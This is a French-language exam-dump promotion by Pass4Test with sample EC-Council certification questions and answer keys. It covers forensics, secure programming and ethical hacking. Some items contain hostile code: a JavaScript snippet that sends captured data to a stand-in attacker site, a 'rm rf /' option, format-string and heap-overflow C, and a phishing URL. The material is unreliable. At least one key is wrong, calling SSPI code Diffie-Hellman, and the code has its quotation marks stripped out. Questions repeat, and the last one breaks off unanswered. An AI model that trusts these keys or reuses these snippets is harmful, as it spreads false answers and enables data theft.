Mettre à jour la plus rapide croissance IT questions et réponses de l'examen de certification: EC-COUNCIL

显示标签为“EC-COUNCIL”的博文。显示所有博文

2014年6月11日星期三

Le dernier examen EC-COUNCIL 312-76 EC0-349 gratuit Télécharger

Si vous hésitez encore à nous choisir, vous pouvez tout d'abord télécharger le démo gratuit dans le site Pass4Test pour connaître mieux la fiabilité de Pass4Test. Nous avons la confiance à vous promettre que vous allez passer le test EC-COUNCIL 312-76 à la première fois.

Pass4Test est un site particulier à offrir les guides de formation à propos de test certificat IT. La version plus nouvelle de Q&A EC-COUNCIL EC0-349 peut répondre sûrement une grande demande des candidats. Comme tout le monde le connait, le certificat EC-COUNCIL EC0-349 est un point important pendant l'interview dans les grandes entreprises IT. Ça peut expliquer un pourquoi ce test est si populaire. En même temps, Pass4Test est connu par tout le monde. Choisir le Pass4Test, choisir le succès. Votre argent sera tout rendu si malheureusement vous ne passe pas le test EC-COUNCIL EC0-349.

C'est pas facile à passer le test Certification EC-COUNCIL 312-76, choisir une bonne formation est le premier bas de réussir, donc choisir une bonne resource des informations de test EC-COUNCIL 312-76 est l'assurance du succès. Pass4Test est une assurance comme ça. Une fois que vous choisissez le test EC-COUNCIL 312-76, vous allez passer le test EC-COUNCIL 312-76 avec succès, de plus, un an de service en ligne après vendre est gratuit pour vous.

Code d'Examen: 312-76
Nom d'Examen: EC-COUNCIL (Disaster Recovery Professional Practice Test)
Questions et réponses: 290 Q&As

Code d'Examen: EC0-349
Nom d'Examen: EC-COUNCIL (Computer Hacking Forensic Investigator)
Questions et réponses: 374 Q&As

Pass4Test est un seul site web qui peut offrir toutes les documentations de test EC-COUNCIL EC0-349. Ce ne sera pas un problème à réussir le test EC-COUNCIL EC0-349 si vous préparez le test avec notre guide d'étude.

Quand vous hésitez même à choisir Pass4Test, le démo gratuit dans le site Pass4Test est disponible pour vous à essayer avant d'acheter. Nos démos vous feront confiant à choisir Pass4Test. Pass4Test est votre meilleur choix à passer l'examen de Certification EC-COUNCIL 312-76, et aussi une meilleure assurance du succès du test 312-76. Vous choisissez Pass4Test, vous choisissez le succès.

Le test EC-COUNCIL 312-76 peut bien examnier les connaissances et techniques professionnelles. Pass4Test est votre raccourci amené au succès de test EC-COUNCIL 312-76. Chez Pass4Test, vous n'avez pas besoin de dépenser trop de temps et d'argent juste pour préparer le test EC-COUNCIL 312-76. Travaillez avec l'outil formation de Pass4Test visé au test, il ne vous demande que 20 heures à préparer.

Dans cette société, il y a plein de gens talentueux, surtout les professionnels de l'informatique. Beaucoup de gens IT se battent dans ce domaine pour améliorer l'état de la carrière. Le test 312-76 est lequel très important dans les tests de Certification EC-COUNCIL. Pour être qualifié de EC-COUNCIL, on doit obtenir le passport de test EC-COUNCIL 312-76.

EC0-349 Démo gratuit à télécharger: http://www.pass4test.fr/EC0-349.html

NO.1 In the following Linux command, what is the outfile?
dd if=/usr/bin/personal/file.txt of=/var/bin/files/file.txt
A./usr/bin/personal/file.txt
B./var/bin/files/file.txt
C./bin/files/file.txt
D.There is not outfile specified
Answer: B

certification EC-COUNCIL   EC0-349 examen   certification EC0-349

NO.2 The efforts to obtain information before a trial by demanding documents, depositions, questions and
answers written under oath, written requests for admissions of fact, and examination of the scene is a
description of what legal term?
A.Detection
B.Hearsay
C.Spoliation
D.Discovery
Answer: D

EC-COUNCIL examen   certification EC0-349   EC0-349 examen   certification EC0-349

NO.3 What hashing method is used to password protect Blackberry devices?
A.AES
B.RC5
C.MD5
D.SHA-1
Answer: D

EC-COUNCIL   certification EC0-349   certification EC0-349

NO.4 Why is it still possible to recover files that have been emptied from the Recycle Bin on a Windows
computer?
A.The data is still present until the original location of the file is used
B.The data is moved to the Restore directory and is kept there indefinitely
C.The data will reside in the L2 cache on a Windows computer until it is manually deleted
D.It is not possible to recover data that has been emptied from the Recycle Bin
Answer: A

EC-COUNCIL examen   EC0-349   certification EC0-349

NO.5 A forensics investigator needs to copy data from a computer to some type of removable media so he
can
examine the information at another location. The
problem is that the data is around 42GB in size. What type of removable media could the investigator
use?
A.Blu-Ray single-layer
B.HD-DVD
C.Blu-Ray dual-layer
D.DVD-18
Answer: C

EC-COUNCIL examen   certification EC0-349   EC0-349 examen

NO.6 What will the following Linux command accomplish?
dd if=/dev/mem of=/home/sam/mem.bin bs=1024
A.Copy the master boot record to a file
B.Copy the contents of the system folder mem to a file
C.Copy the running memory to a file
D.Copy the memory dump file to an image file
Answer: C

certification EC-COUNCIL   EC0-349 examen   EC0-349 examen

NO.7 When a router receives an update for its routing table, what is the metric value change to that path?
A.Increased by 2
B.Decreased by 1
C.Increased by 1
D.Decreased by 2
Answer: C

certification EC-COUNCIL   certification EC0-349   certification EC0-349   certification EC0-349

NO.8 What is the last bit of each pixel byte in an image called?
A.Last significant bit
B.Least significant bit
C.Least important bit
D.Null bit
Answer: B

EC-COUNCIL examen   EC0-349 examen   EC0-349   EC0-349

Dernières EC-COUNCIL 312-92 412-79 examen pratique questions et réponses

Vous n'avez besoin que de faire les exercices à propos du test EC-COUNCIL 312-92 offertes par Pass4Test, vous pouvez réussir le test sans aucune doute. Et ensuite, vous aurez plus de chances de promouvoir avec le Certificat. Si vous ajoutez le produit au panier, nous vous offrirons le service 24h en ligne.

Le Certificat EC-COUNCIL 412-79 est un passport rêvé par beaucoup de professionnels IT. Le test EC-COUNCIL 412-79 est une bonne examination pour les connaissances et techniques professionnelles. Il demande beaucoup de travaux et efforts pour passer le test EC-COUNCIL 412-79. Pass4Test est le site qui peut vous aider à économiser le temps et l'effort pour réussir le test EC-COUNCIL 412-79 avec plus de possibilités. Si vous êtes intéressé par Pass4Test, vous pouvez télécharger la partie gratuite de Q&A EC-COUNCIL 412-79 pour prendre un essai.

Pass4Test peut vous fournir un raccourci à passer le test EC-COUNCIL 312-92: moins de temps et efforts dépensés. Vous trouverez les bonnes documentations de se former dans le site Pass4Test qui peut vous aider efficacement à réussir le test EC-COUNCIL 312-92. Si vous voyez les documentations dans les autres sites, c'est pas difficile à trouver qu''elles sont venues de Pass4Test, parce que lesquelles dans Pass4Test sont le plus complété et la mise à jour plus vite.

Code d'Examen: 312-92
Nom d'Examen: EC-COUNCIL (EC-Council Certified Secure Programmer v2)
Questions et réponses: 99 Q&As

Code d'Examen: 412-79
Nom d'Examen: EC-COUNCIL (EC-Council Certified Security Analyst (ECSA))
Questions et réponses: 74 Q&As

La solution offerte par Pass4Test comprenant un test simulation bien proche de test réel EC-COUNCIL 312-92 peut vous assurer à réussir 100% le test EC-COUNCIL 312-92. D'ailleur, le service de la mise à jour gratuite est aussi pour vous. Maintenant, vous pouvez télécharger le démo gratuit pour prendre un essai.

L'équipe de Pass4Test se composant des experts dans le domaine IT. Toutes les Q&As sont examinées par nos experts. Les Q&As offertes par Pass4Test sont réputées pour sa grande couverture ( presque 100%) et sa haute précision. Vous pouvez trouver pas mal de sites similaires que Pass4Test, ces sites peut-être peuvent vous offrir aussi les guides d'études ou les services en ligne, mais on doit admettre que Pass4Test peut être la tête de ces nombreux sites. La mise à jour, la grande couverture des questions, la haute précision des réponses nous permettent à augmenter le taux à réussir le test Certification EC-COUNCIL 312-92. Tous les points mentionnés ci-dessus seront une assurance 100% pour votre réussite de test Certification EC-COUNCIL 312-92.

312-92 Démo gratuit à télécharger: http://www.pass4test.fr/312-92.html

NO.1 Shayla is designing a web-based application that will pass data to and from a company extranet. This
data is very sensitive and must be protected at all costs. Shayla will use a digital certificate and a digital
signature to protect the data. The digital signature she has chosen to use is based on the difficulty in
computing discrete logarithms. Which digital signature has she chosen?
A. Rabin
B. Diffie-Hellman
C. SA-PSS
D. ElGamal
Answer: D

certification EC-COUNCIL   certification 312-92   312-92 examen

NO.2 Harold is programming an application that needs to be incorporate data encryption. Harold decides to
utilize an encryption algorithm that uses 4-bit working registers instead of the usual 2bit working registers.
What encryption algorithm has Harold decided to use?
A. Blowfish
B. RC5
C. RC4
D. RC6
Answer: D

EC-COUNCIL   certification 312-92   certification 312-92   312-92   certification 312-92

NO.3 What security package is implemented with the following code.?
dwStatus = DsMakSpn
(
ldap ,
MyServer.Mydomain.com ,
NULL,
0,
NULL,
&pcSpnLength,
pszSpn
);
rpcStatus = RpcServerRegisterAuthInfo
(
psz
RPC_C_AUTHN_GSS_NEGOTIATE,
NULL,
NULL
);
A. Diffie-Hellman encryption
B. Repurposing
C. SSPI
D. SMDT
Answer: A

certification EC-COUNCIL   312-92   312-92 examen   certification 312-92

NO.4 Steve is using the libcap library to create scripts for capturing and analyzing network traffic.
Steve has never used libcap before and is struggling with finding out the correct functions to use. Steve is
trying to pick the default network interface in his script and does not know which function to use. Which
function would he use to correctly choose the default interface in the script?
A. pcap_open_live
B. pcap_int_default
C. pcap_lookupdev
D. pcap_use_int
Answer: C

EC-COUNCIL examen   certification 312-92   312-92   312-92   certification 312-92

NO.5 Kenny is the CIO for Fredrickson Entertainment, a gaming software company in Omaha. The
developers in Kenny s company have just finished creating a 3D first person shooter game that will be
released to the market within the next couple of months. Kenny is trying to decide what type of license or
activation code structure they should use for the game to prevent piracy and protect their product. Kenny
decides to go with an approach that will allow each sold copy to be activated online up to five times
because he knows his users might have multiple PCs or might need to reinstall the product at some point.
What type of activation policy has Kenny decided to go with?
A. Loose license enforced
reasonable use
B. License terms enforced
fair use
C. Strict license terms enforced
D. Monitor only mode
Answer: A

EC-COUNCIL examen   certification 312-92   312-92 examen   312-92 examen   312-92 examen

NO.6 Processes having the CAP_NET_BIND_SERVICE
can listen on which ports?
A. Any TCP port over 1024
B. Any UDP port under 1024
C. Any TCP port under 1024
D. Any UDP port over 1024
Answer: C

certification EC-COUNCIL   312-92   312-92 examen   312-92 examen

NO.7 John is creating a website using ASP. John s web pages will have a number of calculations, so he
decides to create an include file that the pages will call so he does not have to rewrite the formula
numerous times. John s website will be hosted by a server running IIS. John wants to ensure that the
include source code is not revealed when the pages are viewed, so he gives the include an .asp
extension.
When IIS processes the include file, which system file will be used to hide the include source code?
A. ASP.dll
B. Include.dll
C. IISASP.dll
D. IIS.dll
Answer: A

EC-COUNCIL examen   312-92 examen   312-92 examen   312-92 examen

NO.8 David is an applications developer working for Dewer and Sons law firm in Los Angeles David just
completed a course on writing secure code and was enlightened by all the intricacies of how code must
be rewritten many times to ensure its security. David decides to go through all the applications he has
written and change them to be more secure. David comes across the following snippet in one of his
programs:
#include <stdio.h>
int main(int argc, char **argv)
{
int number = 5;
printf(argv[1]);
putchar( \n );
printf( number (%p) is equal to %d\n ,
&value, value);
}
What could David change, add, or delete to make this code more secure?
A. Change putchar( \n ) to putchar( %s , \n )
B. Change printf(argv[1]) to printf( %s , argv[1])
C. Change printf(argv[1]) to printf(constv [0])
D. Change int number = 5 to const number =
Answer: B

EC-COUNCIL   312-92 examen   312-92   312-92 examen

2014年4月21日星期一

EC-COUNCIL meilleur examen 312-50, questions et réponses

Pass4Test est un fournisseur professionnel des documentations à propos du test Certification IT, avec lequel vous pouvez améliorer le future de votre carrière. Vous trouverez que nos Q&As seraient persuadantes d'après d'avoir essayer nos démos gratuits. Le démo de EC-COUNCIL 312-50 (même que les autres démos) est gratuit à télécharger. Vous n'aurez pas aucune hésitation après travailler avec notre démo.

Chaque expert dans l'équipe de Pass4Test ont son autorité dans cette industrie. Ils profitent ses expériences et ses connaissances professionnelles à préparer les documentations pour les candidats de test Certification IT. Les Q&As produites par Pass4Test ont une haute couverture des questions et une bonne précision des réponses qui vous permettent la réussie de test par une seule fois. D'ailleurs, un an de service gratuit en ligne après vendre est aussi disponible pour vous.

La Q&A EC-COUNCIL 312-50 est étudiée par les experts de Pass4Test qui font tous effort en profitant leurs connaissances professionnelles. La Q&A de Pass4Test est ciblée aux candidats de test IT Certification. Vous voyez peut-être les Q&As similaires dansn les autres site web, mais il n'y a que Pass4Test d'avoir le guide d'étude plus complet. C'est le meilleur choix à s'assurer le succès de test Certification EC-COUNCIL 312-50.

Le test simulation EC-COUNCIL 312-50 sorti par les experts de Pass4Test est bien proche du test réel. Nous sommes confiant sur notre produit qui vous permet à réussir le test EC-COUNCIL 312-50 à la première fois. Si vous ne passe pas le test, votre argent sera tout rendu.

Code d'Examen: 312-50
Nom d'Examen: EC-COUNCIL (Ethical Hacker Certified)
Questions et réponses: 765 Q&As

Le suucès n'est pas loin de vous une fois que vous choisissez le produit de Q&A EC-COUNCIL 312-50 de Pass4Test.

Le Certificat de EC-COUNCIL 312-50 signifie aussi un nouveau jalon de la carrière, le travail aura une space plus grande à augmenter, et tout le monde dans l'industrie IT sont désireux de l'obtenir. En face d'une grande passion pour le test Certification EC-COUNCIL 312-50, le contrariété est le taux très faible à réussir. Bien sûr que l'on ne passe pas le test 312-50 sans aucun éffort, en même temps, le test de EC-COUNCIL 312-50 demande les connaissances bien professionnelles. Le guide d'étude dans le site Pass4Test peut vous fournir un raccourci à réussir le test EC-COUNCIL 312-50 et à obtenir le Certificat de ce test. Choisissez le guide d'étude de Pass4Test, vous verrez moins de temps dépensés, moins d'efforts contribués, mais plus de chances à réussir le test. Ça c'est une solution bien rentable pour vous.

La partie plus nouvelle de test Certification EC-COUNCIL 312-50 est disponible à télécharger gratuitement dans le site de Pass4Test. Les exercices de Pass4Test sont bien proches de test réel EC-COUNCIL 312-50. En comparaison les Q&As dans les autres sites, vous trouverez que les nôtres sont beaucoup plus complets. Les Q&As de Pass4Test sont tout recherchés par les experts de Pass4Test, y compris le test simulation.

312-50 Démo gratuit à télécharger: http://www.pass4test.fr/312-50.html

NO.1 Which one of the following is defined as the process of distributing incorrect
Internet Protocol (IP) addresses/names with the intent of diverting traffic?
A. Network aliasing
B. Domain Name Server (DNS) poisoning
C. Reverse Address Resolution Protocol (ARP)
D. Port scanning
Answer: B

EC-COUNCIL examen   312-50   312-50   certification 312-50   312-50

NO.2 Which of the following tools are used for footprinting?(Choose four.
A. Sam Spade
B. NSLookup
C. Traceroute
D. Neotrace
E. Cheops
Answer: A, B, C, D

EC-COUNCIL examen   312-50   certification 312-50   certification 312-50   312-50

NO.3 You are footprinting an organization to gather competitive intelligence. You visit
the company's website for contact information and telephone numbers but do not
find it listed there. You know that they had the entire staff directory listed on their
website 12 months ago but not it is not there.
How would it be possible for you to retrieve information from the website that is
outdated?
A. Visit google's search engine and view the cached copy.
B. Visit Archive.org web site to retrieve the Internet archive of the company's website.
C. Crawl the entire website and store them into your computer.
D. Visit the company's partners and customers website for this information.
Answer: B

EC-COUNCIL examen   312-50   certification 312-50   certification 312-50

NO.4 A very useful resource for passively gathering information about a target company
is:
A. Host scanning
B. Whois search
C. Traceroute
D. Ping sweep
Answer: B

EC-COUNCIL   312-50   312-50 examen   312-50

NO.5 What does the term "Ethical Hacking" mean?
A. Someone who is hacking for ethical reasons.
B. Someone who is using his/her skills for ethical reasons.
C. Someone who is using his/her skills for defensive purposes.
D. Someone who is using his/her skills for offensive purposes.
Answer: C

certification EC-COUNCIL   312-50   312-50

NO.6 You receive an email with the following message:
Hello Steve,
We are having technical difficulty in restoring user database record after the recent
blackout. Your account data is corrupted. Please logon to the SuperEmailServices.com
and change your password.
http://www.supermailservices.com@0xde.0xad.0xbe.0xef/support/logon.htm
If you do not reset your password within 7 days, your account will be permanently
disabled locking you out from our e-mail services.
Sincerely,
Technical Support
SuperEmailServices
From this e-mail you suspect that this message was sent by some hacker since you
have been using their e-mail services for the last 2 years and they have never sent
out an e-mail such as this. You also observe the URL in the message and confirm
your suspicion about 0xde.0xad.0xbde.0xef which looks like hexadecimal numbers.
You immediately enter the following at Windows 2000 command prompt:
Ping0xde.0xad.0xbe.0xef
You get a response with a valid IP address.
What is the obstructed IP address in the e-mail URL?
A. 222.173.190.239
B. 233.34.45.64
C. 54.23.56.55
D. 199.223.23.45
Answer: A

EC-COUNCIL examen   312-50 examen   certification 312-50   certification 312-50   312-50

NO.7 What is "Hacktivism"?
A. Hacking for a cause
B. Hacking ruthlessly
C. An association which groups activists
D. None of the above
Answer: A

EC-COUNCIL   certification 312-50   312-50 examen   312-50   certification 312-50

NO.8 To what does "message repudiation" refer to what concept in the realm of email
security?
A. Message repudiation means a user can validate which mail server or servers a message
was passed through.
B. Message repudiation means a user can claim damages for a mail message that
damaged their reputation.
C. Message repudiation means a recipient can be sure that a message was sent from a
particular person.
D. Message repudiation means a recipient can be sure that a message was sent from a
certain host.
E. Message repudiation means a sender can claim they did not actually send a particular
message.
Answer: E

EC-COUNCIL examen   312-50   312-50   312-50

NO.9 Who is an Ethical Hacker?
A. A person whohacksfor ethical reasons
B. A person whohacksfor an ethical cause
C. A person whohacksfor defensive purposes
D. A person whohacksfor offensive purposes
Answer: C

EC-COUNCIL   certification 312-50   certification 312-50   312-50   312-50

NO.10 You are footprinting Acme.com to gather competitive intelligence. You visit the
acme.com websire for contact information and telephone number numbers but do
not find it listed there. You know that they had the entire staff directory listed on
their website 12 months ago but now it is not there. How would it be possible for you
to retrieve information from the website that is outdated?
A. Visit google search engine and view the cached copy.
B. Visit Archive.org site to retrieve the Internet archive of the acme website.
C. Crawl the entire website and store them into your computer.
D. Visit the company's partners and customers website for this information.
Answer: B

EC-COUNCIL   312-50   312-50   certification 312-50

NO.11 A Certkiller security System Administrator is reviewing the network system log files.
He notes the following:
- Network log files are at 5 MB at 12:00 noon.
-At 14:00 hours, the log files at 3 MB.
What should he assume has happened and what should he do about the situation?
A. He should contact the attacker's ISP as soon as possible and have the connection
disconnected.
B. He should log the event as suspicious activity, continue to investigate, and take further
steps according to site security policy.
C. He should log the file size, and archive the information, because the router crashed.
D. He should run a file system check, because the Syslog server has a self correcting file
system problem.
E. He should disconnect from the Internet discontinue any further unauthorized use,
because an attack has taken place.
Answer: B

EC-COUNCIL   certification 312-50   312-50 examen   312-50

NO.12 Where should a security tester be looking for information that could be used by an
attacker against an organization? (Select all that apply)
A. CHAT rooms
B. WHOIS database
C. News groups
D. Web sites
E. Search engines
F. Organization's own web site
Answer: A, B, C, D, E, F

EC-COUNCIL   312-50   312-50   312-50 examen   312-50 examen

NO.13 According to the CEH methodology, what is the next step to be performed after
footprinting?
A. Enumeration
B. Scanning
C. System Hacking
D. Social Engineering
E. Expanding Influence
Answer: B

EC-COUNCIL examen   312-50   312-50

NO.14 What are the two basic types of attacks?(Choose two.
A. DoS
B. Passive
C. Sniffing
D. Active
E. Cracking
Answer: B, D

certification EC-COUNCIL   312-50   certification 312-50   312-50

NO.15 Which of the following activities will NOT be considered as passive footprinting?
A. Go through the rubbish to find out any information that might have been discarded.
B. Search on financial site such as Yahoo Financial to identify assets.
C. Scan the range of IP address found in the target DNS database.
D. Perform multiples queries using a search engine.
Answer: C

certification EC-COUNCIL   312-50   certification 312-50   312-50

NO.16 User which Federal Statutes does FBI investigate for computer crimes involving
e-mail scams and mail fraud?
A. 18 U.S.C 1029 Possession of Access Devices
B. 18 U.S.C 1030 Fraud and related activity in connection with computers
C. 18 U.S.C 1343 Fraud by wire, radio or television
D. 18 U.S.C 1361 Injury to Government Property
E. 18 U.S.C 1362 Government communication systems
F. 18 U.S.C 1831 Economic Espionage Act
G. 18 U.S.C 1832 Trade Secrets Act
Answer: B

EC-COUNCIL examen   312-50 examen   certification 312-50   certification 312-50

NO.17 What is the essential difference between an 'Ethical Hacker' and a 'Cracker'?
A. The ethical hacker does not use the same techniques or skills as a cracker.
B. The ethical hacker does it strictly for financial motives unlike a cracker.
C. The ethical hacker has authorization from the owner of the target.
D. The ethical hacker is just a cracker who is getting paid.
Answer: C

certification EC-COUNCIL   312-50   312-50   312-50   certification 312-50

NO.18 How does Traceroute map the route that a packet travels from point A to point B?
A. It uses a TCP Timestamp packet that will elicit a time exceed in transit message.
B. It uses a protocol that will be rejected at the gateways on its way to its destination.
C. It manipulates the value of time to live (TTL) parameter packet to elicit a time
exceeded in transit message.
D. It manipulated flags within packets to force gateways into generating error messages.
Answer: C

EC-COUNCIL   312-50 examen   312-50

NO.19 Your Certkiller trainee Sandra asks you which are the four existing Regional
Internet Registry (RIR's)?
A. APNIC, PICNIC, ARIN, LACNIC
B. RIPE NCC, LACNIC, ARIN, APNIC
C. RIPE NCC, NANIC, ARIN, APNIC
D. RIPE NCC, ARIN, APNIC, LATNIC
Answer: B

certification EC-COUNCIL   312-50   312-50   312-50 examen

NO.20 Snort has been used to capture packets on the network. On studying the packets, the
penetration tester finds it to be abnormal. If you were the penetration tester, why
would you find this abnormal?
(Note: The student is being tested on concept learnt during passive OS
fingerprinting, basic TCP/IP connection concepts and the ability to read packet
signatures from a sniff dumo.)
05/20-17:06:45.061034 192.160.13.4:31337 -> 172.16.1.101:1
TCP TTL:44 TOS:0x10 ID:242
***FRP** Seq: 0XA1D95 Ack: 0x53 Win: 0x400
...
05/20-17:06:58.685879 192.160.13.4:31337 ->
172.16.1.101:1024
TCP TTL:44 TOS:0x10 ID:242
***FRP** Seg: 0XA1D95 Ack: 0x53 Win: 0x400
What is odd about this attack? (Choose the most appropriate statement)
A. This is not a spoofed packet as the IP stack has increasing numbers for the three flags.
B. This is back orifice activity as the scan comes from port 31337.
C. The attacker wants to avoid creating a sub-carrier connection that is not normally
valid.
D. There packets were created by a tool; they were not created by a standard IP stack.
Answer: B

EC-COUNCIL   312-50   certification 312-50   312-50

Choisissez le Pass4Test, choisissez le succès de test EC-COUNCIL 312-50. Bonne chance à vous.

Le matériel de formation de l'examen de meilleur EC-COUNCIL 312-92

Vous pouvez s'exercer en Internet avec le démo gratuit. Vous allez découvrir que la Q&A de Pass4Test est laquelle le plus complète. C'est ce que vous voulez.

Le test simulation EC-COUNCIL 312-92 sorti par les experts de Pass4Test est bien proche du test réel. Nous sommes confiant sur notre produit qui vous permet à réussir le test EC-COUNCIL 312-92 à la première fois. Si vous ne passe pas le test, votre argent sera tout rendu.

Selon les feedbacks les professionnels bien réputés dans l'Industrie IT, Pass4Test est un bon catalyseur de leurs succès. L'outil de formation offert par Pass4Test leur aide d'économiser le temps et l'argent, le plus important est qu'ils aient passé le test EC-COUNCIL 312-92 avec succès. Pass4Test est un fournissur fiable. Vous allez réaliser votre rêve avec l'aide de Pass4Test.

Pass4Test a une grande équipe composée des experts d'expérience dans l'industrie IT. Leurs connaissances professionnelles et les recherches font une bonne Q&A, qui vous permet à passer le test EC-COUNCIL 312-92. Dans Pass4Test, vous pouvez trouver une façon plus convenable à se former. Les resources de Pass4Test sont bien fiable. Choisissez Pass4Test, choisissez un raccourci à réussir le test EC-COUNCIL 312-92.

Code d'Examen: 312-92
Nom d'Examen: EC-COUNCIL (EC-Council Certified Secure Programmer v2)
Questions et réponses: 99 Q&As

Le Certificat EC-COUNCIL 312-92 est un passport rêvé par beaucoup de professionnels IT. Le test EC-COUNCIL 312-92 est une bonne examination pour les connaissances et techniques professionnelles. Il demande beaucoup de travaux et efforts pour passer le test EC-COUNCIL 312-92. Pass4Test est le site qui peut vous aider à économiser le temps et l'effort pour réussir le test EC-COUNCIL 312-92 avec plus de possibilités. Si vous êtes intéressé par Pass4Test, vous pouvez télécharger la partie gratuite de Q&A EC-COUNCIL 312-92 pour prendre un essai.

Le test Certification EC-COUNCIL 312-92 est une chance précieuse à augmenter vos connaissances de technologie informatique dans l'industrie IT. Il attire beaucoup de professionls à participer ce test. Pass4Test peut vous offrir les outils de formation particuliers à propos de test EC-COUNCIL 312-92. Vous réaliserez plus tôt votre rêve avec la Q&A écrite par l'équipe professionnelle de Pass4Test. Pass4Test se contribue à vous donner un coup de main pour réussir le test EC-COUNCIL 312-92.

312-92 Démo gratuit à télécharger: http://www.pass4test.fr/312-92.html

NO.1 Which Linux command will securely delete a file by overwriting its contents?
A. rm rf /
B. Shred
C. ps rm
D. del rm
Answer: B

EC-COUNCIL   certification 312-92   312-92   certification 312-92

NO.2 Devon is an applications developer that just got back from a conference on how to correctly write code.
Devon has a number of programs he has written that access data across WAN links, so he is particularly
concerned about their security. Devon writes a script in C++ to check the security of the programs running
on his internal servers. What will the following code from Devon s script accomplish?
#include <iostream>
#include <socket.cpp>
#include <util.h>
using namespace std;
bool tryPort(int p);
string target("");
int main(int argC, char *argV[])
{
printf("PlagueZ port scanner 0.1\n");
int startPort = getInt("start Port: ");
int endPort = getInt("end Port: ");
target = getString("Host: ");
printf("[Processing port %d to %d]\n",
startPort, endPort);
for(int i=0; i<endPort; i++)
{
printf("[Trying port: %d]\n", i);
if(tryPort(i)) // port open
printf("[Port %d is open]\n", i);
}
printf("------Scan Finished-------\n");
system("pause");
return 0;
}
bool tryPort(int p)
{
SocketClient *scan;
try
{
scan = new SocketClient(target, p);
}
catch(int e) { delete &scan; return
false; }
delete &scan;
return true;
}
A. Scan the perimeter firewall for DoS vulnerabilities
B. Create socket connections to the remote sites to check their security
C. Close off any ports used by malicious code
D. Scan for open ports
Answer: D

EC-COUNCIL examen   312-92   certification 312-92   312-92

NO.3 Travis, a senior systems developer for YNY Services, received an email recently from an unknown
source. Instead of opening the email on his normal production machine, Travis decides to copy the email
to a thumb drive and examine it from a quarantined PC not on the network. Travis examines the email and
discovers a link that is supposed to take him to http://scarysite.com. Travis decides to get back on his
production computer and examine the code of that site.
From the following code snippet, what has Travis discovered?
<script>
function object() {
this.email setter = captureobject
}
function captureobject(x) {
var objstring =
for(fld in this) {
obstring += fld + :
this[fld] + , ;
}
obstring += email:
+ x;
var req = new XMLHttpRequest();
req.open( GET , http://scarysite.com?obj=
+
escape(objString), true);
req.send(null);
}
</script>
A. URL obfuscation
B. XSS attack
C. JavaScript hijacking
D. URL tampering
Answer: C

EC-COUNCIL   312-92   312-92   312-92   312-92 examen

NO.4 What security package is implemented with the following code.?
dwStatus = DsMakSpn
(
ldap ,
MyServer.Mydomain.com ,
NULL,
0,
NULL,
&pcSpnLength,
pszSpn
);
rpcStatus = RpcServerRegisterAuthInfo
(
psz
RPC_C_AUTHN_GSS_NEGOTIATE,
NULL,
NULL
);
A. Diffie-Hellman encryption
B. Repurposing
C. SSPI
D. SMDT
Answer: A

EC-COUNCIL   312-92 examen   312-92   312-92

NO.5 Steve is using the libcap library to create scripts for capturing and analyzing network traffic.
Steve has never used libcap before and is struggling with finding out the correct functions to use. Steve is
trying to pick the default network interface in his script and does not know which function to use. Which
function would he use to correctly choose the default interface in the script?
A. pcap_open_live
B. pcap_int_default
C. pcap_lookupdev
D. pcap_use_int
Answer: C

EC-COUNCIL   312-92   certification 312-92   312-92

NO.6 David is an applications developer working for Dewer and Sons law firm in Los Angeles David just
completed a course on writing secure code and was enlightened by all the intricacies of how code must
be rewritten many times to ensure its security. David decides to go through all the applications he has
written and change them to be more secure. David comes across the following snippet in one of his
programs:
#include <stdio.h>
int main(int argc, char **argv)
{
int number = 5;
printf(argv[1]);
putchar( \n );
printf( number (%p) is equal to %d\n ,
&value, value);
}
What could David change, add, or delete to make this code more secure?
A. Change putchar( \n ) to putchar( %s , \n )
B. Change printf(argv[1]) to printf( %s , argv[1])
C. Change printf(argv[1]) to printf(constv [0])
D. Change int number = 5 to const number =
Answer: B

EC-COUNCIL   312-92 examen   certification 312-92   312-92 examen

NO.7 Processes having the CAP_NET_BIND_SERVICE
can listen on which ports?
A. Any TCP port over 1024
B. Any UDP port under 1024
C. Any TCP port under 1024
D. Any UDP port over 1024
Answer: C

EC-COUNCIL examen   certification 312-92   312-92 examen   312-92   certification 312-92   312-92 examen

NO.8 What would be the result of the following code?
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
char *input=malloc(20);
char *output=malloc(20);
strcpy(output, normal output );
strcpy(input, argv[1]); printf( input at %p: %s\n , input, input);
printf( output at %p: %s\n , output, output);
printf( \n\n%s\n , output);
}
A. Stack buffer overflow
B. Heap overflow
C. Query string manipulation
D. Pointer Subterfuge
Answer: B

EC-COUNCIL   312-92   certification 312-92

NO.9 Harold is programming an application that needs to be incorporate data encryption. Harold decides to
utilize an encryption algorithm that uses 4-bit working registers instead of the usual 2bit working registers.
What encryption algorithm has Harold decided to use?
A. Blowfish
B. RC5
C. RC4
D. RC6
Answer: D

certification EC-COUNCIL   312-92 examen   312-92 examen   312-92   312-92

NO.10 Wayne is a gaming software developer for a large video gaming company in Los Angeles. Wayne has
just completed developing a new action/adventure game for the company that is to be released soon. To
protect the company s copyright on the game, Wayne would like to incorporate a technology that will
restrict the use of the digital files by controlling access, altering, sharing, copying, printing, and saving.
What technology does Wayne want to use?
A. ARM
B. WRM
C. DRM
D. Diffusion
Answer: C

EC-COUNCIL examen   312-92 examen   312-92   312-92

NO.11 After learning from an external auditor that his code was susceptible to attack, George decided to
rewrite some of his code to look like the following. What is George preventing by changing the code?
public voif doContent(...) {
...
String s;
if ((s = getUsernameByID( userid )) != null) {
s = StringUtils.encodeToHTML(s, 50);
response.write( <br>Applicant:<u>
+ s +
</u> );
}
...
}
A. Query string manipulation
B. XSS attack
C. Cookie poisoning
D. SQL injection
Answer: B

EC-COUNCIL examen   312-92   312-92   312-92   312-92 examen

NO.12 John is creating a website using ASP. John s web pages will have a number of calculations, so he
decides to create an include file that the pages will call so he does not have to rewrite the formula
numerous times. John s website will be hosted by a server running IIS. John wants to ensure that the
include source code is not revealed when the pages are viewed, so he gives the include an .asp
extension.
When IIS processes the include file, which system file will be used to hide the include source code?
A. ASP.dll
B. Include.dll
C. IISASP.dll
D. IIS.dll
Answer: A

certification EC-COUNCIL   312-92   312-92 examen

NO.13 Kenny is the CIO for Fredrickson Entertainment, a gaming software company in Omaha. The
developers in Kenny s company have just finished creating a 3D first person shooter game that will be
released to the market within the next couple of months. Kenny is trying to decide what type of license or
activation code structure they should use for the game to prevent piracy and protect their product. Kenny
decides to go with an approach that will allow each sold copy to be activated online up to five times
because he knows his users might have multiple PCs or might need to reinstall the product at some point.
What type of activation policy has Kenny decided to go with?
A. Loose license enforced
reasonable use
B. License terms enforced
fair use
C. Strict license terms enforced
D. Monitor only mode
